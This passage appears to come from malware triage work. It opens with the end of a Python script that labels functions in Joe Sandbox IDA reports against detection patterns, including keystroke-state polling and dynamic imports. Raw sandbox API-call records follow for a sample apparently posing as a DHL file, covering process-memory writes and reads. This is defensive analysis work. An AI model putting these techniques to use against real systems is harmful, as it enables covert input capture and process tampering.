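    0x0202: "WM_LBUTTONUP",
    0x1004: "LVM_GETITEMCOUNT",   # LVM_FIRST (0x1000) + 4
    0x102C: "LVM_GETITEMSTATE",   # LVM_FIRST + 44
}

# Hypothetical pattern table: every member must appear among a function's
# direct calls (API names plus decoded message names) for the label to fire.
PATTERNS = {
    "dynamic import resolution": {"LoadLibraryW", "GetProcAddress"},
    "input state polling": {"GetAsyncKeyState"},
    "synthetic mouse click": {"WM_LBUTTONDOWN", "WM_LBUTTONUP"},
}


def decode_message(args):
    """Name the uMsg argument (second parameter) of a Send/PostMessage call."""
    if len(args) < 2 or not re.fullmatch(r"[0-9A-F]{8}", args[1]):
        return None
    return WM_NAMES.get(int(args[1], 16))


def parse_records(text):
    """Return {opcode_id: [call, ...]}; each call records API name, module,
    call-site ref, split argument list, whether it is a direct call of this
    function (not a subcall attribution) and any decoded window message."""
    records = OrderedDict()
    current = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            continue
        m = API_RE.match(line)
        if m:
            subcall, api, module, argstr, ref = m.groups()
            args = argstr.split(",") if argstr else []
            current.append({
                "api": api, "module": module, "ref": ref, "args": args,
                "direct": subcall is None,
                "msg": decode_message(args) if api in MESSAGE_APIS else None,
            })
            continue
        m = OPCODE_RE.match(line)
        if m:                      # Opcode ID closes the record
            records[m.group(1)] = current
            current = []
    return records


def flag_records(records):
    """Map opcode_id -> sorted labels of PATTERNS satisfied by direct calls."""
    flagged = {}
    for opcode_id, calls in records.items():
        names = {c["api"] for c in calls if c["direct"]}
        names |= {c["msg"] for c in calls if c["direct"] and c["msg"]}
        hits = sorted(label for label, need in PATTERNS.items() if need <= names)
        if hits:
            flagged[opcode_id] = hits
    return flagged


if __name__ == "__main__":
    for oid, hits in flag_records(parse_records(SAMPLE)).items():
        print(oid[:16], ", ".join(hits))
```

Run it against the full report text (the real records carry extra "Memory Dump Source" lines, which the regexes ignore) to get a per-function label list keyed by Opcode ID; since the Opcode ID is a content hash, the same key can be used to recognise these runtime functions in other AutoIt-compiled samples and skip them.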
                                                                                    APIs
                                                                                    • IsWindow.USER32(00000000), ref: 00825A6E
                                                                                    • GetForegroundWindow.USER32 ref: 00825A85
                                                                                    • GetDC.USER32(00000000), ref: 00825AC1
                                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 00825ACD
                                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 00825B08
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                    APIs
                                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 007B134D
                                                                                    • SelectObject.GDI32(?,00000000), ref: 007B135C
                                                                                    • BeginPath.GDI32(?), ref: 007B1373
                                                                                    • SelectObject.GDI32(?,00000000), ref: 007B139C
                                                                                    Similarity
                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: _memcmp
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00814ABA
                                                                                    • __beginthreadex.LIBCMT ref: 00814AD8
                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00814AED
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00814B03
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00814B0A
                                                                                    Similarity
                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                    APIs
                                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0080821E
                                                                                    • GetLastError.KERNEL32(?,00807CE2,?,?,?), ref: 00808228
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00807CE2,?,?,?), ref: 00808237
                                                                                    • HeapAlloc.KERNEL32(00000000,?,00807CE2,?,?,?), ref: 0080823E
                                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00808255
                                                                                    Similarity
                                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                    APIs
                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00807044,80070057,?,?,?,00807455), ref: 00807127
                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00807044,80070057,?,?), ref: 00807142
                                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00807044,80070057,?,?), ref: 00807150
                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00807044,80070057,?), ref: 00807160
                                                                                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00807044,80070057,?,?), ref: 0080716C
                                                                                    Similarity
                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                    APIs
                                                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00815260
                                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0081526E
                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00815276
                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00815280
                                                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008152BC
                                                                                    Similarity
                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                    APIs
                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00808121
                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0080812B
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0080813A
                                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00808141
                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00808157
                                                                                    Similarity
                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0080C1F7
                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 0080C20E
                                                                                    • MessageBeep.USER32(00000000), ref: 0080C226
                                                                                    • KillTimer.USER32(?,0000040A), ref: 0080C242
                                                                                    • EndDialog.USER32(?,00000001), ref: 0080C25C
                                                                                    Similarity
                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                    APIs
                                                                                    • EndPath.GDI32(?), ref: 007B13BF
                                                                                    • StrokeAndFillPath.GDI32(?,?,007EB888,00000000,?), ref: 007B13DB
                                                                                    • SelectObject.GDI32(?,00000000), ref: 007B13EE
                                                                                    • DeleteObject.GDI32 ref: 007B1401
                                                                                    • StrokePath.GDI32(?), ref: 007B141C
                                                                                    Similarity
                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                    APIs
                                                                                      • Part of subcall function 007D0DB6: std::exception::exception.LIBCMT ref: 007D0DEC
                                                                                      • Part of subcall function 007D0DB6: __CxxThrowException@8.LIBCMT ref: 007D0E01
                                                                                      • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
                                                                                      • Part of subcall function 007B7A51: _memmove.LIBCMT ref: 007B7AAB
                                                                                    • __swprintf.LIBCMT ref: 007C2ECD
                                                                                    Strings
                                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 007C2D66
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                    • API String ID: 1943609520-557222456
                                                                                    • Opcode ID: 793ef01cf2255ad2661c581425d88d3c8b14b3e1b19fe02800debdaae7e5c5b2
                                                                                    • Instruction ID: e40bcf80f81e1d1eafdfffc33d238962819c3ac5c520b6b70dafbb8bbbf45137
                                                                                    • Opcode Fuzzy Hash: 793ef01cf2255ad2661c581425d88d3c8b14b3e1b19fe02800debdaae7e5c5b2
                                                                                    • Instruction Fuzzy Hash: 5F914A71108205DFC718EF28C889EAEB7B4EF85710F14491EF5959B2A2EA38ED45CB52
                                                                                    APIs
                                                                                      • Part of subcall function 007B4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007B4743,?,?,007B37AE,?), ref: 007B4770
                                                                                    • CoInitialize.OLE32(00000000), ref: 0081B9BB
                                                                                    • CoCreateInstance.OLE32(00842D6C,00000000,00000001,00842BDC,?), ref: 0081B9D4
                                                                                    • CoUninitialize.OLE32 ref: 0081B9F1
                                                                                      • Part of subcall function 007B9837: __itow.LIBCMT ref: 007B9862
                                                                                      • Part of subcall function 007B9837: __swprintf.LIBCMT ref: 007B98AC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                    • String ID: .lnk
                                                                                    • API String ID: 2126378814-24824748
                                                                                    • Opcode ID: 111cb3837514b34f16a242b87c7aad04621f1d8397d3ae4a7d1eb0e9121e7838
                                                                                    • Instruction ID: cc844af39a5ef51e1a963b232fc0ce229f8b0e7417a32dfec8a6dffcfcf8270e
                                                                                    • Opcode Fuzzy Hash: 111cb3837514b34f16a242b87c7aad04621f1d8397d3ae4a7d1eb0e9121e7838
                                                                                    • Instruction Fuzzy Hash: B8A136756043059FC704DF14C484E9ABBE9FF89324F148958F9A99B3A1CB35EC85CB91
                                                                                    APIs
                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 007D50AD
                                                                                      • Part of subcall function 007E00F0: __87except.LIBCMT ref: 007E012B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorHandling__87except__start
                                                                                    • String ID: pow
                                                                                    • API String ID: 2905807303-2276729525
                                                                                    • Opcode ID: 37320978c1328ebc0d695e43e4cc8882389567798f0d2038a1343678abf505f9
                                                                                    • Instruction ID: 217c0673abdcb4c3b3b7af31c3a4a0d2a5c308cf8f69dc409ad5c807648a4b24
                                                                                    • Opcode Fuzzy Hash: 37320978c1328ebc0d695e43e4cc8882389567798f0d2038a1343678abf505f9
                                                                                    • Instruction Fuzzy Hash: 5D51AB2090E646C7DB117739C84537E2BE4BB45300F248D5AE4D58A3A9EFBC8DC4DAC2
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove
                                                                                    • String ID: 3c|$_|
                                                                                    • API String ID: 4104443479-1588047251
                                                                                    • Opcode ID: 4ae07cf14a2d1c7ddc6d66ead22b8ac8e5e12c24c9b322839b8113c37d3b8bde
                                                                                    • Instruction ID: 2569ae9129928b1d2c0a14c001094bead8cfa107f6376ffd35f752024d3830db
                                                                                    • Opcode Fuzzy Hash: 4ae07cf14a2d1c7ddc6d66ead22b8ac8e5e12c24c9b322839b8113c37d3b8bde
                                                                                    • Instruction Fuzzy Hash: CD514C709006199FCB64CF68C894ABEBBB1FF44304F248529E95AD7350EB38E955CB51
                                                                                    APIs
                                                                                      • Part of subcall function 008114BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00809296,?,?,00000034,00000800,?,00000034), ref: 008114E6
                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0080983F
                                                                                      • Part of subcall function 00811487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008092C5,?,?,00000800,?,00001073,00000000,?,?), ref: 008114B1
                                                                                      • Part of subcall function 008113DE: GetWindowThreadProcessId.USER32(?,?), ref: 00811409
                                                                                      • Part of subcall function 008113DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0080925A,00000034,?,?,00001004,00000000,00000000), ref: 00811419
                                                                                      • Part of subcall function 008113DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0080925A,00000034,?,?,00001004,00000000,00000000), ref: 0081142F
                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008098AC
                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008098F9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                    • String ID: @
                                                                                    • API String ID: 4150878124-2766056989
                                                                                    • Opcode ID: 0cc56794e61f019d36c89203b9219b2c9372fbc74341d0d292ca19665bdda8ab
                                                                                    • Instruction ID: 23e7a472b6f9440b03f1b6f6d20a21fd4944914abdc8957470176d5f8056d8ae
                                                                                    • Opcode Fuzzy Hash: 0cc56794e61f019d36c89203b9219b2c9372fbc74341d0d292ca19665bdda8ab
                                                                                    • Instruction Fuzzy Hash: 4B413A76901218AECF10DFA4CD86ADEBBB8FF49700F004099FA55A7181DA706E85CBA1
                                                                                    APIs
                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0083F910,00000000,?,?,?,?), ref: 008379DF
                                                                                    • GetWindowLongW.USER32 ref: 008379FC
                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00837A0C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long
                                                                                    • String ID: SysTreeView32
                                                                                    • API String ID: 847901565-1698111956
                                                                                    • Opcode ID: 39ce7a8b959b46fc7298e0961bb3340a903c9588822039fd77cdbf3fc0ce77fe
                                                                                    • Instruction ID: baf87b031296fc28d431e12f20c9084f27105563990f497f114e05b76c14e61f
                                                                                    • Opcode Fuzzy Hash: 39ce7a8b959b46fc7298e0961bb3340a903c9588822039fd77cdbf3fc0ce77fe
                                                                                    • Instruction Fuzzy Hash: 1931E171204206ABDB218E38DC45BEA7BA9FB85334F204725F975E32E1D734ED518B90
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00837461
                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00837475
                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00837499
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window
                                                                                    • String ID: SysMonthCal32
                                                                                    • API String ID: 2326795674-1439706946
                                                                                    • Opcode ID: 49b66fdec9c59dde46ae7829b69d6399decdae81550a5d1b07947ec0e9fdc3e1
                                                                                    • Instruction ID: b15b637bf36d5da28e94339cb89dbcfc3d3370d3d5c5a70b34f20bb47a064a4b
                                                                                    • Opcode Fuzzy Hash: 49b66fdec9c59dde46ae7829b69d6399decdae81550a5d1b07947ec0e9fdc3e1
                                                                                    • Instruction Fuzzy Hash: F0218072500218ABDF218E54CC46FEA3B69FB88724F110214FA55AB190DAB5E8919BE0
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00837C4A
                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00837C58
                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00837C5F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                    • String ID: msctls_updown32
                                                                                    • API String ID: 4014797782-2298589950
                                                                                    • Opcode ID: 6c4482489da7e2c85870e2a8952f09ca157d0a3f5f236c7828974c285aeda179
                                                                                    • Instruction ID: 01417578f0f456f796436644ddf502dd0d51040af542a842269cc2a2ea2331f5
                                                                                    • Opcode Fuzzy Hash: 6c4482489da7e2c85870e2a8952f09ca157d0a3f5f236c7828974c285aeda179
                                                                                    • Instruction Fuzzy Hash: E5217CB1604208AFDB20DF28DCC5DA737ACFB9A364B140459FA15DB3A1CB71EC418AA0
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00836D3B
                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00836D4B
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00836D70
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$MoveWindow
                                                                                    • String ID: Listbox
                                                                                    • API String ID: 3315199576-2633736733
                                                                                    • Opcode ID: 277968233b3c7733ed1e35b6b31212d1a9c5d49adbf0a029042783eae38c4f6b
                                                                                    • Instruction ID: 1954315f66c20b07aeeb29c2cded89d26da1dd04b8f5e64d7d65e6a3eecd5d51
                                                                                    • Opcode Fuzzy Hash: 277968233b3c7733ed1e35b6b31212d1a9c5d49adbf0a029042783eae38c4f6b
                                                                                    • Instruction Fuzzy Hash: 9A218032600118BFDF118F58DC45EAB3BAAFFC9764F418128FA459B1A0DA719C6287E0
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00837772
                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00837787
                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00837794
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: msctls_trackbar32
                                                                                    • API String ID: 3850602802-1010561917
                                                                                    • Opcode ID: 3edb880d67dc3ddbc30076887569d3172a3f0495ce7d80957f1c4d92a3ce3c5d
                                                                                    • Instruction ID: 93417b63ab7132dca1790d427deddafbe528be360ac8ce70b7f902e3b6122651
                                                                                    • Opcode Fuzzy Hash: 3edb880d67dc3ddbc30076887569d3172a3f0495ce7d80957f1c4d92a3ce3c5d
                                                                                    • Instruction Fuzzy Hash: 3B1123B2200208BAEF205F64CC05FEB37A8FFC9B64F010628FA41E2190D272E811CB60
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,007B4B83,?), ref: 007B4C44
                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 007B4C56
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                    • API String ID: 2574300362-1355242751
                                                                                    • Opcode ID: 677b3c3793f1b0a06d6aea2a4b098a38d8453838ca8110adb77b0a9114558ee7
                                                                                    • Instruction ID: 5ff018bb5918ad77212fd88b12354ff19e5f7e7276e12c2faca4d3a3ee4e7af8
                                                                                    • Opcode Fuzzy Hash: 677b3c3793f1b0a06d6aea2a4b098a38d8453838ca8110adb77b0a9114558ee7
                                                                                    • Instruction Fuzzy Hash: 26D01270910713CFD7205F31D90965A77D4BF45751F118C3A99A6D6262E678D480C6A0
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,007B4BD0,?,007B4DEF,?,008752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007B4C11
                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 007B4C23
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
